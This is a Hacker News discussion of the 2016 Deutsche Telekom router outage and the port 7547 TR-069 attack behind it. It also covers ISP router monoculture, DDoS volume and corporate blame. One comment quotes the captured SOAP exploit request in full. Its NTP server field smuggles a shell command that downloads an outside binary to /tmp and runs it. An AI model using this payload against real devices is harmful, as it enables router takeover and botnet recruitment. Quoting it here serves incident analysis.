
Deutsche Telekom says 900k fixed-line customers suffer outages - Bouncingsoul1
http://in.reuters.com/article/deutsche-telekom-outages-idINL8N1DT1FV
======
raesene6
So from
[https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execut...](https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759)

\- this appears to be an attack on an externally visible port (7547)

\- There is publicly available exploit code for this issue
([https://www.exploit-db.com/exploits/40740/](https://www.exploit-
db.com/exploits/40740/))

\- There are at least 41 Million hosts on the Internet with that port open.

Sounds like quite a few people are going to have a bad time over this, and I'm
left once again shaking my head at how someone ships an Internet facing
consumer device with an open port by default.....

~~~
atesti
I see that the exploit sets an ntp-server with shell code in backticks. ok.
But imagine the router did not have this exploit: Why on earth can anybody
connect to that port and configure the NTP server? How is authentication for
TR69 supposed to work??

~~~
mgliwka
The original disclosure from kenzo2017 covers this:
[https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-...](https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-
is-wide-open-to-being-hacked/)

 _When Eir’s technical support want to manage the modem – maybe to reset the
Wi-Fi password, they instruct the ACS (Access Control Server – the server used
to manage the modems) to connect to the modem on port 7547 and send it a
“connection request” command. The modem then connects to the ACS and Eir’s
technical support can change whatever settings they want._

------
martinald
The level of attacks seems definitely to be ramping up.

I think the main reason for this jump has been the fact attackers are starting
to make significant money out of these attacks now - especially now they can
accept funds easily via Bitcoin. Before I think attacks were mainly for the
lulz or very sophisticated attackers with various goals, but there must be
hundreds of millions of dollars in ransoms being paid out now.

Nearly anyone can now start making very good money with some simple tools. And
like any business people start innovating a lot quicker with a profit motive.

------
B3D4
POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1) SOAPAction: urn:dslforum-
org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-
ENV="[http://schemas.xmlsoap.org/soap/envelope/"](http://schemas.xmlsoap.org/soap/envelope/")
SOAP-
ENV:encodingStyle="[http://schemas.xmlsoap.org/soap/encoding/">](http://schemas.xmlsoap.org/soap/encoding/">)
<SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget
[http://l.ocal.host/2;chmod](http://l.ocal.host/2;chmod) 777
2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-
ENV:Envelope>

#./2 .... busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP ...

next version step Mirai?

[https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e...](https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e488b84e07959472ed05755548efec90df82701e/analysis/1480335565/)

~~~
mschuster91
What is this? A TR 069 exploit?!

~~~
B3D4
[https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code...](https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759/)

~~~
mschuster91
Thanks.

Jeez, I hate Telekom routers. They're unstable pieces of crap (except the
rare, rebranded AVM Fritzbox models). Back when I was doing freelance home IT
support, these dungheap devices caused most of the problems.

------
Aaargh20318
Anyone else who thinks 900k routers, running 900k identical firmware versions,
with 900k identical copies of any exploitable bugs, running on a predictable
IP-range might be a bit of a problem, from a security PoV ?

I wish ISP's stopped providing routers with their connections, if only to
prevent this kind of dangerous monoculture.

~~~
Jdam
900k devices is a monoculture, really? What about the billions of Windows &
Linux powered devices out there? I bet with a Linux 0day, you can exploit 10s
of billions of devices out there, including routers.

~~~
Aaargh20318
> What about the billions of Windows & Linux powered devices out there?

What about them ? Do they all have routable IP's or are they behind one of
these cheap-ass routers.

~~~
Jdam
I guess forcing a heterogeneous router landscape to mitigate attack risks is
called security through obscurity.

------
noir_lord
What's scary about this is I have 100Mbps fiber at home.

At some point 900,000 routers with 100Mbps fiber might be a realistic user
base that would be tremendous amount of traffic to smack people and that's
without considering amplification attacks and such.

Thats assuming a volumetric attack, even just "request foo.co.uk every half
second" would be catastrophic, 1.8 million requests per second would be a bit
of a bugger to handle.

~~~
dx034
It's probably still 100Mbps download. Upload is much lower (10Mbps perhaps?)
and the attack volume is determined by that.

I guess ISP specific attacks (with ISP specific boxes) wouldn't be that much
of an issue as the ISP could be blocked. Will deny service to all users there,
but the fault is clearly with the ISP, so they have to fix it. It's much more
problematic if a generic router that's being used across the globe has a
vulnerability. Filtering traffic will be much harder and ISPs will deny
responsibility as it's not due to their machines.

~~~
iamzenitraM
OVH recently received a 150gbps DDoS from the biggest ISP on Spain
(Telefonica) not long after they deployed symmetric 300mbps to almost all of
their domestic customers at a decent price - OVH had to divert traffic over
two different routes to be able to even _filter_ all of the incoming traffic.

[https://forum.ovh.es/showthread.php?14451-Informaci%F3n-rela...](https://forum.ovh.es/showthread.php?14451-Informaci%F3n-relativa-
a-los-problemas-de-conexi%F3n-hacia-los-servicios-de-OVH) (use Google
Translate)

As those connections spread (and they will - if you have optic fiber coverage,
the slowest you can get is symmetric 50mbps), things will only get funnier

------
kriro
I also remember reports that 110 and 112 calls (German emergency numbers) were
down for four hours in some county recently due to technical issues on DTs
part. I never saw an explanation what the exact cause was. Fire services and
police handled it decently (iirc. stuff got routed to the next city and they
increased patrol cars). Still a bit alarming that there's no fail over in
place and these numbers basically rely on one company (probably routed in the
fact that DT used to be state owned and is thus still implicitly trusted?).

------
fahrradflucht
"Based on the error pattern, we cannot exclude the possibility that the
routers have been targeted by external parties with the result that they can
no longer register on the network." [0]

[0] [https://www.telekom.com/en/media/media-
information/archive/i...](https://www.telekom.com/en/media/media-
information/archive/information-on-current-problems-444862) (this should be
the threads link in my opinion)

~~~
heisenbit
Telkom is the old national fixed line carrier with millions of customers. As
they run the copper plant most of the DSL carrier modems are operated by them
- there are some other carriers renting and reselling. They sell and rent
customer DSL modems. One is also able to connect third party modems. Looks
like modems of their main brand "Speedport" is affected. The Telkom link is
the official company statement however lacks details. More technical details
can be found from Heise:

[https://www.heise.de/newsticker/meldung/Grossstoerung-bei-
de...](https://www.heise.de/newsticker/meldung/Grossstoerung-bei-der-Telekom-
Die-Telekom-prueft-Hinweise-auf-Hackerangriff-3506044.html)

[https://translate.google.com/translate?sl=de&tl=en&js=y&prev...](https://translate.google.com/translate?sl=de&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=https%3A%2F%2Fwww.heise.de%2Fnewsticker%2Fmeldung%2FGrossstoerung-
bei-der-Telekom-Die-Telekom-prueft-Hinweise-auf-
Hackerangriff-3506044.html&edit-text=)

------
aluhut
> If problems persisted Deutsche Telekom suggested customers disconnect their
> routers from the network

Actually they suggest you disconnect the router, wait a few seconds and then
reconnect it.

It's fixed now according to them.

[https://www.heise.de/newsticker/meldung/Grossstoerung-bei-
de...](https://www.heise.de/newsticker/meldung/Grossstoerung-bei-der-Telekom-
Die-Telekom-prueft-Hinweise-auf-Hackerangriff-3506044.html)

------
mgliwka
The original disclosure of the vulnerability is also an interesting read:
[https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-...](https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-
is-wide-open-to-being-hacked/)

------
aibottle
This is what you get for dumb and needless centralization of infrastructure
inside a capitalistic system, which does not at all incentivize maintenance
and providing security!

------
mcrae

      and it could not rule out "targeted external factors" as the reason
    

Yes, and DT could also not rule out extra-terrestrial interference. But who
cares?

It seems any large-scale enterprise incident is blamed on some other nebulous
third-party these days (Russia, 400 lb men in their beds..) in order shift
blame elsewhere.

Do the general public see through this?

~~~
throwbsidbdk
Companies have always shifted blame. I think there's just less disadvantage to
admitting you were hacked than there used to be.

Companies used to keep that stuff under wraps to avoid looking weak, but it's
so common now that it doesn't really hurt your brand to say it.

The truth will come out pretty quickly, anyone doing transit or peering can
see any attack happen

~~~
aluhut
> I think there's just less disadvantage to admitting you were hacked than
> there used to be.

Is there any data that would support this claim?

I just don't believe it. This is the worse version of a technical failure.
Admitting a technical failure would therefore be automatically better then a
hack.

~~~
Lewton
> This is the worse version of a technical failure. Admitting a technical
> failure would therefore be automatically better then a hack.

I really doubt that's the way the general public views this (and they're the
ones that matter when it comes to what companies are willing to admit)

If they say they had a technical error the perception would be that it's their
fault.

If they say that they've been hacked the perception would be that it's because
someone else did something bad, so they're the victims.

I think this is terrible, but I fear that it's the truth

~~~
aluhut
Actually most of the "general public" complain about the router. The rest
complains about the general incompetence of the former government institution
that failed them again (20years of them going public recently. Was a huge scam
for the "general public"). But of course, there is still the Querfront
fraction who doesn't want this to be just another Russia hack.

If you'd come up to them and gave them a technical reason they don't even
understand, it couldn't be worse. This is Germany here. People do have a
genetically build in respect for people who talk a version of the language
they don't comprehend since they must be a authority.

